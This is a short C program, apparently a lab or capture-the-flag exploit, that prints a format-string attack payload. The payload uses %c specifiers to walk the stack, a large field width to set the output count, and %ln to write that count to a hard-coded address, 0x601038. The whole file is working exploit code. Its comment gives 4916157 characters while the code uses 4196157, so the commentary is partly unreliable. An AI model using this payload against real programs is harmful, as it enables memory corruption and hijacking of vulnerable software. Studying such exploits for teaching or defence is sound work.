#include <stdio.h>

int main(void) {
    /* advance through 5 registers, then
     * 5 * 8 = 40 bytes down stack, outputting
     * 4916157 + 9 characters before using 
     * %ln to store a long.
     */
    fputs("%c%c%c%c%c%c%c%c%c%.4196157u%ln", stdout);
    /* include 5 bytes of padding to make current location
     * in buffer match where on the stack printf will be reading.
     */
    fputs("?????", stdout);
    void *ptr = (void*) 0x601038;
    /* write pointer value, which will include \0s */
    fwrite(&ptr, 1, sizeof(ptr), stdout);
    fputs("\n", stdout);
}